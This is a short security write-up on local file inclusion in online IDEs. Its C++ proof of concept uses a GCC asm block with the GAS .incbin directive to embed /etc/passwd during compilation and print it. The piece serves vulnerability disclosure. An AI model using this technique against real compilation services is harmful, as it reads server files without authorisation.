Online IDE and Local File Inclusion

Recently, many online IDEs have appeared with the ability to compile and run including native applications. Naturally, the question arises about the security of such services. Compiled programs run in a sandbox, but compilation itself often occurs in an unprotected environment.

GCC + GAS

GCC allows using the asm directive to call GAS, which has a great incbin instruction . With its help at the compilation stage, you can include the file as data. Then the exploit for C ++ looks like this:

 #include <stdio.h> extern "C" asm( ".global _data\n" ".data\n" "_data:\n" ".incbin \"/etc/passwd\"\n" ".byte 0" ); extern const char _data; const char* data = &_data; int main() { printf("%s", data); }